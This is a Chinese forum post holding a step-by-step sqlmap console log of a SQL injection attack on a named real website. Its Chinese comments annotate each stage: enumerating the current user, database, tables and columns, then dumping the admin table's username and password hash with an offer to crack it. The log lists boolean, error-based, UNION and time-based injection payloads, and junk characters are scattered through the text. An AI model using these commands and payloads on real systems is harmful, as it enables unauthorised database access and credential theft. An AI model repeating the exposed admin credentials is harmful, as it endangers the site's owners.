D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( T; q6 R! A9 C6 m) F% }
ms "Mysql" --current-user /* 注解:获取当前用户名称$ R. J$ g3 E, \) A; `( n7 b
sqlmap/0.9 - automatic SQL injection and database takeover tool1 x' ]* h4 N5 A
http://sqlmap.sourceforge.net starting at: 16:53:54
4 u: L5 ~- |3 n[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
, t; \4 Y2 o. @7 p) s' \ session file
4 y% a0 @; s. D% Y4 ^3 o1 ?[16:53:54] [INFO] resuming injection data from session file: x& G S! Z0 P% ^/ t
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& n- T7 J) y$ f/ B" A1 t# [4 k8 ][16:53:54] [INFO] testing connection to the target url
3 G K8 B r0 [ Msqlmap identified the following injection points with a total of 0 HTTP(s) reque4 |, `# [/ p) i2 K/ d5 S
sts:' G7 n3 Q9 ^$ [3 T7 ~. Y
---
3 q6 J$ x& \2 yPlace: GET) [* v$ I8 G( @, B/ ^+ z8 E8 N
Parameter: id
% z' E; x+ k2 J. J0 r: k6 \ Type: boolean-based blind* R3 R6 j' {5 c j, {7 v; m
Title: AND boolean-based blind - WHERE or HAVING clause
7 J# E2 k, }7 v2 L% q Payload: id=276 AND 799=7999 _( Q3 a/ v4 l3 A* {' O1 H
Type: error-based% ]! ^, |, t- D! C- R/ A: H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# I2 B' f }1 R b0 } Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 L2 e L9 S1 v" b p
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 @. k; E% e& `' K5 S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) t0 e) w! y A1 s5 d7 h
Type: UNION query
) M: T" N: g' w! s, P' K5 L* f: n Title: MySQL UNION query (NULL) - 1 to 10 columns3 U* p6 S# p! T
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ D# o% I6 N# R/ d7 B2 p5 x
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 I9 B3 u, ^ u, X
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! w- a. s! z$ a d8 w+ R3 O. u
Type: AND/OR time-based blind) M& U0 F4 c; z6 T' Q
Title: MySQL > 5.0.11 AND time-based blind6 \% u( Z$ o! ~7 q
Payload: id=276 AND SLEEP(5)4 \3 p$ H) O7 r5 Q0 X
---
0 H t& g% ~" k9 W[16:53:55] [INFO] the back-end DBMS is MySQL" y3 e- l$ [, n- a
web server operating system: Windows: X7 i; x' Y c# T
web application technology: Apache 2.2.11, PHP 5.3.0
. a6 Z0 b' Q) Eback-end DBMS: MySQL 5.0
, d% _1 K+ c2 Q; Y" G[16:53:55] [INFO] fetching current user+ c& n, [7 \& h0 L2 m% {( q
current user: 'root@localhost'
* j4 q) q$ k& e* O" |% |2 o1 q3 j[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 M$ S1 D' L [: {: { W; X% p
tput\www.wepost.com.hk' shutting down at: 16:53:58& w8 J( V. ~/ J3 Q1 K) O
# Q* Q. { x+ ^% A% BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. W) e; t; H5 |ms "Mysql" --current-db /*当前数据库
! t0 ]7 z/ A! @- o- r sqlmap/0.9 - automatic SQL injection and database takeover tool( E! I; s7 b5 I& W) G& v
http://sqlmap.sourceforge.net starting at: 16:54:16
/ H x) T( q4 V8 U5 x) K# M[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
8 X' d- j( y" U- m( F session file) [% Y9 o5 w* H7 [. Z
[16:54:16] [INFO] resuming injection data from session file
/ N; u. _, t- o [[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! u$ U2 H0 p5 M1 ?5 C# J* e[16:54:16] [INFO] testing connection to the target url
/ ?$ E5 E% e) a9 t, Y( j! G: esqlmap identified the following injection points with a total of 0 HTTP(s) reque
( ?( r7 E( h0 ysts:
/ v, f. N/ K o7 Y, t! B---2 q; [- B% O6 {, F$ Z1 W( ?
Place: GET
1 [" A6 Q4 j% w. aParameter: id5 b# |% T& `2 S; P" T/ ^* ~
Type: boolean-based blind
) O% w' g$ ^$ E Title: AND boolean-based blind - WHERE or HAVING clause" k% `# T2 v% ]
Payload: id=276 AND 799=7990 q& k+ v$ W' _2 w# w* g9 N
Type: error-based ?) \0 y2 V$ v P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- P8 Q9 Y+ B" }7 v1 ], i
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 n0 o& g5 t( X% g120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- Z$ M" X/ L6 l1 V- a3 z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) k/ w2 s0 \+ \" Z% j4 P9 y
Type: UNION query
2 X) N) J2 u1 r4 v) L( r Title: MySQL UNION query (NULL) - 1 to 10 columns6 [9 Y2 @# B& Y7 z- ^1 N
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 X- ~) B8 n- d E. \0 J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. g4 l4 z/ P$ B
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* W( z2 e! i6 D! k8 P* Y2 H Type: AND/OR time-based blind8 p/ |+ w/ t+ q5 l
Title: MySQL > 5.0.11 AND time-based blind! a& b/ w |% a! M i- w. m
Payload: id=276 AND SLEEP(5)% P- t8 |- c0 h/ H; D7 O1 |2 ~
---
& a3 j+ W0 Y' E[16:54:17] [INFO] the back-end DBMS is MySQL
7 y5 j) R) H: w) {( l* t- ?web server operating system: Windows
! [/ y1 B1 @. cweb application technology: Apache 2.2.11, PHP 5.3.0
0 b% ?+ G' {5 A( v% lback-end DBMS: MySQL 5.0; Q! @" B) r' Q: g
[16:54:17] [INFO] fetching current database
4 C. u( V+ j+ N: t( J! m) fcurrent database: 'wepost'% p6 z; ~& y+ n/ x w$ g- a
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# [0 t8 x. t2 q! R' n
tput\www.wepost.com.hk' shutting down at: 16:54:18; h, |; f, R& s- H% L7 J; q: X! v# z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" Q; {$ U: X4 N1 A& c
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
) P) v+ \" b$ n/ k sqlmap/0.9 - automatic SQL injection and database takeover tool9 v, `: K' n9 w; {* D% K
http://sqlmap.sourceforge.net starting at: 16:55:25; B, u# n T6 N U
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
$ H" {% V& p, K/ a- u' H session file
8 @9 X0 k0 W1 \% M+ D9 Y[16:55:25] [INFO] resuming injection data from session file
* g& s9 K1 s R+ m) Y" j3 L+ m[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 t& U! q, }2 O1 V
[16:55:25] [INFO] testing connection to the target url$ e0 Y: o( Y# Z8 f
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. D) n9 B* i: p( ests:; \% q7 d/ t5 ]5 K& @
---
u5 m) B, l! z9 v* j3 kPlace: GET& J. y3 v$ q% U; i$ N/ Z* q9 J
Parameter: id
* M& V% j! \, L Type: boolean-based blind4 K+ g: N2 b a# Y
Title: AND boolean-based blind - WHERE or HAVING clause
2 G+ L1 ^+ o A2 u. y2 x( j Payload: id=276 AND 799=799
# }3 U7 e% X) t2 X: m# ~ Type: error-based9 ]4 T/ k# W* s
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 @; a8 W4 ~. E p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' i8 l+ o3 \! r120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ Y- ]) e- A# z; m),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ Y( J1 i" H! r8 N. b
Type: UNION query7 U' f) n; R# v6 z* ~
Title: MySQL UNION query (NULL) - 1 to 10 columns
8 Q/ S: X6 s1 r0 g% k* I Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. Q3 Y4 |/ z( a& m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! s1 ` r% v P/ G$ j3 ~3 F$ MCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ E; y% I5 D$ D$ b$ t# e% r2 L# Y
Type: AND/OR time-based blind
6 d' d& U P2 w9 v6 T) k4 c0 R& q Title: MySQL > 5.0.11 AND time-based blind0 T- s! @0 B/ l* t+ p
Payload: id=276 AND SLEEP(5)
' c W: Q- A& t* c9 `---: y) T0 s' {2 K9 ?1 f) J8 Q
[16:55:26] [INFO] the back-end DBMS is MySQL) y3 S$ a8 l, G1 F$ M8 Z* C
web server operating system: Windows5 Y! A% b/ u( b3 ?# V4 B% B. b9 \
web application technology: Apache 2.2.11, PHP 5.3.0
$ J4 k5 m2 P, q4 g2 S. B) G5 I5 d: Gback-end DBMS: MySQL 5.0+ e9 e0 { y1 v% ~
[16:55:26] [INFO] fetching tables for database 'wepost'
6 n9 j1 E) L4 V/ l[16:55:27] [INFO] the SQL query used returns 6 entries
5 Y" S* d4 w6 m E/ {2 P4 a# z8 t. PDatabase: wepost: j- W- m& ?; N; D% @, ]
[6 tables]
5 ~/ M% b0 G. d: [ o0 x+ B' U+-------------+3 w9 G6 f+ j8 ^7 _- w8 j4 ]
| admin |2 y A" ?# R! B. B- I8 V
| article |
' l+ G$ \& a8 \| contributor |$ s) u S4 q: t+ d' R( S
| idea |2 y5 i Q1 c' S$ @8 m
| image |
1 h4 D" v( B I4 b; o9 J1 o9 {2 l3 E| issue |
8 P1 n$ {9 j" {, U+-------------+
8 d/ z+ i. [! f2 l, f X6 Q2 I[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 o9 } G7 @/ F2 y
tput\www.wepost.com.hk' shutting down at: 16:55:335 D( @" I. [1 g( u
$ s i8 s7 s- _1 J I" DD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
~/ r+ Z1 z, H1 H0 e* {, X3 L7 e$ ems "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
' z: ^ a! p0 @ sqlmap/0.9 - automatic SQL injection and database takeover tool$ @, N8 d( U: B, Z9 Y* G
http://sqlmap.sourceforge.net starting at: 16:56:06 l4 j* O5 Y/ j9 T0 F5 |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 f$ j( B3 L5 c$ ?% W* F$ X
sts:
* g1 m7 S. R* w0 Y5 W4 f* T# ~3 ?---
( U3 H- J w5 D3 g2 DPlace: GET
' I8 _% Z* j) b+ R; Z- bParameter: id! _ J6 y, p3 y* P9 G0 f* G
Type: boolean-based blind
- N4 N6 X" p, r/ ]6 M Title: AND boolean-based blind - WHERE or HAVING clause9 | K# c6 J3 D( n/ h+ Z9 q) `- a6 u
Payload: id=276 AND 799=799 h2 J% Y( _) s8 g) e! d( d+ u1 X) x
Type: error-based' V! l: Y6 D/ D6 Q0 O7 n- M0 Z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 k: E; T$ `2 o Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( O! p9 D- m) x: V120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 Z/ K; x" N2 k5 F6 d# W+ \
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 D |4 l8 O$ `
Type: UNION query v) R/ k4 I* O6 M
Title: MySQL UNION query (NULL) - 1 to 10 columns
L( Q* r& I3 A x+ P6 [9 A Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ B9 z& W7 x9 T" r3 I! ?1 x
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( t/ ]# I* ]3 ]% O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, d) s( R* P$ C: z( }5 i# U# t7 Q Type: AND/OR time-based blind
4 \& C: `; h4 c& e% x: ]# [ Title: MySQL > 5.0.11 AND time-based blind
# y# I) z, |% h. B Payload: id=276 AND SLEEP(5)
& `) `! Y! U( X; S---% o8 n) R! a( p) S
web server operating system: Windows* E6 b' \ o7 E
web application technology: Apache 2.2.11, PHP 5.3.06 G+ x) d" U$ i0 ~
back-end DBMS: MySQL 5.0% v! f: _$ ~% J0 m
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: v5 E: y5 j+ _* p! Wssion': wepost, wepost
/ w( |. x# v$ P, z) L j% {Database: wepost& K0 A" @, f/ v0 }
Table: admin
1 ~1 Y' T: C' e- b4 j[4 columns]
( }( A3 } T% ~+----------+-------------+* s" x+ N: ]% ]; j- @+ y
| Column | Type |: f3 a; ]( m. J" a! F; c' I
+----------+-------------+
c/ s! D% z" H$ R| id | int(11) |6 w. f, W$ y) i2 J, }) c
| password | varchar(32) |' R4 f3 g" u- I
| type | varchar(10) |1 c" I" v7 K u) x/ G$ ~( c4 Q/ X- D
| userid | varchar(20) |0 j. m2 d; u; U# `2 q; W9 y
+----------+-------------+
* p0 V( e. i! @' H/ k7 F shutting down at: 16:56:19
# }% f# h: F- m: A, K0 r/ S j. i( E' R/ k3 _
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ t! e8 U$ F. Y! G) G4 Ams "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
# Y4 H0 E* M* M, H+ L2 S; J" i sqlmap/0.9 - automatic SQL injection and database takeover tool. g2 r& S" a& ~' g
http://sqlmap.sourceforge.net starting at: 16:57:14" J7 T7 ^- i) [- V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
* Q' O4 k5 S2 Y, H xsts:4 J4 f. ?# o7 U7 p
---- V6 t$ F& J) m, ?5 B% b
Place: GET
# U4 P5 G! P4 `Parameter: id4 ?0 a, K! T; f) Z
Type: boolean-based blind7 T% v6 o0 t8 A( o
Title: AND boolean-based blind - WHERE or HAVING clause
" Y8 j" s( i: H3 F, d Payload: id=276 AND 799=799) c) v0 s0 B2 B; i
Type: error-based1 B3 p" X6 P% r# B+ F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause g6 Z( Y. X2 A5 b+ O# x8 o
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 |* X/ h8 G, l( u4 F' x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" B% b2 M9 b6 D3 y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" p: ^! V7 E9 i, n; ]2 s Type: UNION query% H$ {3 H: Q, T# x. F% K( {
Title: MySQL UNION query (NULL) - 1 to 10 columns3 B. L/ m H2 \2 Z' E
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ e5 K! u1 ` C: v! |( y2 n; R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," c9 x+ H# G% q: J
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 I2 \ G Q6 E1 R j1 d
Type: AND/OR time-based blind! O' l. L0 r9 r; ?; X' _
Title: MySQL > 5.0.11 AND time-based blind
& [1 o2 l7 d8 g Payload: id=276 AND SLEEP(5)
1 V8 v; V' Z9 |' A4 i5 g---$ {! b3 H7 o5 ^; |. \5 A
web server operating system: Windows; ~1 Y x; a! i5 e6 O
web application technology: Apache 2.2.11, PHP 5.3.0
( P/ A% G. _; _3 z) \9 x" S' ^, iback-end DBMS: MySQL 5.05 c4 [4 q9 s+ j+ {8 B
recognized possible password hash values. do you want to use dictionary attack o- t V/ Q5 `$ P2 Y' J8 Q
n retrieved table items? [Y/n/q] y$ B# {( r8 _% R; }8 I4 l" T
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]3 d% W* N! U4 @
do you want to use common password suffixes? (slow!) [y/N] y
1 ?( ?( T/ @6 Y- l' S7 T& f) k8 zDatabase: wepost* p% u* ~) J5 M
Table: admin$ r" e% g7 r' N0 ]" V- K1 N6 C
[1 entry]1 _" _1 K9 X1 v: o
+----------------------------------+------------+
& j( x. ^! T! b9 H8 T| password | userid |
/ G6 e( w$ ~! W# h/ N6 ]+----------------------------------+------------+% H7 [" V7 p U1 g3 ?9 ^" v
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |0 C3 `8 p% q I& m8 z4 q4 \- Q5 p
+----------------------------------+------------+$ |2 B' r0 W- L0 {& w2 u! G% y
shutting down at: 16:58:14+ x% F$ _" T7 j7 |$ h: I
2 p ?2 y6 s) kD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对